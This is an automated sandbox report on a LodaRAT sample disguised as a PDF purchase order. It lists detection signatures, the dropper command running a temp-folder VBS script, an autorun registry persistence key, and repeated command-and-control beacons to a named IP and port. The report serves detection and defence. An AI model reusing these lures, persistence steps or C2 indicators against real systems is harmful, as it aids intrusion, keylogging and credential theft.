Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order Supplies.Pdf.exe

Overview

General Information

Sample name:Purchase Order Supplies.Pdf.exe
Analysis ID:1541228
MD5:a842353a8fd25a6b05d0d3ce6afe8aad
SHA1:453b9aceb8565d9f838e5bbcd8f694d97741ada9
SHA256:9169a54c077380847a9d8d532fd0e5558d60f881ff6dcc029b2e04c9f9fb8104
Infos:

Detection

LodaRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected LodaRAT
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64_ra
  • Purchase Order Supplies.Pdf.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe" MD5: A842353A8FD25A6B05D0D3CE6AFE8AAD)
    • wscript.exe (PID: 6900 cmdline: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\KKRBIX.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2476240013.0000000003460000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
      00000003.00000002.2471256103.00000000030F7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        00000003.00000002.2471256103.00000000030D8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
          00000001.00000002.2485820292.0000000004D11000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
            Process Memory Space: Purchase Order Supplies.Pdf.exe PID: 7036JoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
              Click to see the 3 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Suspicious Double Extension File Execution
              Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", CommandLine|base64offset|contains: :^, Image: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, NewProcessName: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, OriginalFileName: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ProcessId: 7036, ProcessName: Purchase Order Supplies.Pdf.exe
              Sigma detected: Potentially Suspicious Malware Callback Communication
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, Initiated: true, ProcessId: 7036, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49708
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentProcessId: 7036, ParentProcessName: Purchase Order Supplies.Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, ProcessId: 6900, ProcessName: wscript.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentProcessId: 7036, ParentProcessName: Purchase Order Supplies.Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, ProcessId: 6900, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentProcessId: 7036, ParentProcessName: Purchase Order Supplies.Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, ProcessId: 6900, ProcessName: wscript.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\Google Update.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ProcessId: 7036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KKRBIX
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe", ParentImage: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe, ParentProcessId: 7036, ParentProcessName: Purchase Order Supplies.Pdf.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs, ProcessId: 6900, ProcessName: wscript.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T15:38:30.424583+020028221161Malware Command and Control Activity Detected192.168.2.1649708172.111.138.1005552TCP
              2024-10-24T15:39:34.363167+020028221161Malware Command and Control Activity Detected192.168.2.1649716172.111.138.1005552TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-24T15:38:16.421517+020028498851Malware Command and Control Activity Detected192.168.2.1649714172.111.138.1005552TCP
              2024-10-24T15:38:16.421517+020028498851Malware Command and Control Activity Detected192.168.2.1649716172.111.138.1005552TCP
              2024-10-24T15:38:16.421517+020028498851Malware Command and Control Activity Detected192.168.2.1649708172.111.138.1005552TCP
              2024-10-24T15:38:16.421517+020028498851Malware Command and Control Activity Detected192.168.2.1649715172.111.138.1005552TCP
              2024-10-24T15:38:16.421517+020028498851Malware Command and Control Activity Detected192.168.2.1649711172.111.138.1005552TCP
              2024-10-24T15:38:16.421517+020028498851Malware Command and Control Activity Detected192.168.2.1649713172.111.138.1005552TCP
              2024-10-24T15:38:16.421517+020028498851Malware Command and Control Activity Detected192.168.2.1649710172.111.138.1005552TCP
              2024-10-24T15:38:30.424583+020028498851Malware Command and Control Activity Detected192.168.2.1649708172.111.138.1005552TCP
              2024-10-24T15:38:39.694626+020028498851Malware Command and Control Activity Detected192.168.2.1649709172.111.138.1005552TCP
              2024-10-24T15:38:40.772870+020028498851Malware Command and Control Activity Detected192.168.2.1649709172.111.138.1005552TCP
              2024-10-24T15:38:48.781841+020028498851Malware Command and Control Activity Detected192.168.2.1649710172.111.138.1005552TCP
              2024-10-24T15:38:57.814205+020028498851Malware Command and Control Activity Detected192.168.2.1649711172.111.138.1005552TCP
              2024-10-24T15:39:06.899902+020028498851Malware Command and Control Activity Detected192.168.2.1649713172.111.138.1005552TCP
              2024-10-24T15:39:16.326030+020028498851Malware Command and Control Activity Detected192.168.2.1649714172.111.138.1005552TCP
              2024-10-24T15:39:25.332704+020028498851Malware Command and Control Activity Detected192.168.2.1649715172.111.138.1005552TCP
              2024-10-24T15:39:34.363167+020028498851Malware Command and Control Activity Detected192.168.2.1649716172.111.138.1005552TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\KKRBIX.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Windata\Google Update.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: Purchase Order Supplies.Pdf.exeJoe Sandbox ML: detected
              Source: Purchase Order Supplies.Pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CADD92 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00CADD92
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00CE2044
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00CE219F
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00CE24A9
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00CD6B3F
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00CD6E4A
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CDF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00CDF350
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CDFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00CDFDD2
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CDFD47 FindFirstFileW,FindClose,1_2_00CDFD47

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.16:49708 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49711 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49708 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49715 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.16:49716 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49710 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49716 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49714 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49709 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.16:49713 -> 172.111.138.100:5552
              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_00CE550C
              Source: Purchase Order Supplies.Pdf.exe, 00000001.00000002.2485288040.0000000004CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/:
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00CE7099
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00CE7294
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00CE7099
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,1_2_00CD4342
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00CFF5D0

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: Purchase Order Supplies.Pdf.exe
              Source: initial sampleStatic PE information: Filename: Purchase Order Supplies.Pdf.exe
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00C929C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,1_2_00C929C2
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00D002AA NtdllDialogWndProc_W,1_2_00D002AA
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFE769 NtdllDialogWndProc_W,CallWindowProcW,1_2_00CFE769
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,1_2_00CFEAA6
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFEA4E NtdllDialogWndProc_W,1_2_00CFEA4E
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAAC99 NtdllDialogWndProc_W,1_2_00CAAC99
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,1_2_00CFECBC
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAAD5C NtdllDialogWndProc_W,7479C8D0,NtdllDialogWndProc_W,1_2_00CAAD5C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,1_2_00CFEFA8
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAAFB4 GetParent,NtdllDialogWndProc_W,1_2_00CAAFB4
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF0A1 SendMessageW,NtdllDialogWndProc_W,1_2_00CFF0A1
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,1_2_00CFF122
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF3DA NtdllDialogWndProc_W,1_2_00CFF3DA
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF3AB NtdllDialogWndProc_W,1_2_00CFF3AB
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF37C NtdllDialogWndProc_W,1_2_00CFF37C
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF45A ClientToScreen,NtdllDialogWndProc_W,1_2_00CFF45A
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF425 NtdllDialogWndProc_W,1_2_00CFF425
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00CFF5D0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFF594 GetWindowLongW,NtdllDialogWndProc_W,1_2_00CFF594
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAB7F2 NtdllDialogWndProc_W,1_2_00CAB7F2
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CAB845 NtdllDialogWndProc_W,1_2_00CAB845
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFFE80 NtdllDialogWndProc_W,1_2_00CFFE80
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,1_2_00CFFF91
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CFFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,1_2_00CFFF04
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD70AE: CreateFileW,DeviceIoControl,CloseHandle,1_2_00CD70AE
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CCB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74DE5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,1_2_00CCB9F1
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CD82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00CD82D0
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CA2B401_2_00CA2B40
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CF30AD1_2_00CF30AD
              Source: C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exeCode function: 1_2_00CA36801_2_00CA3680
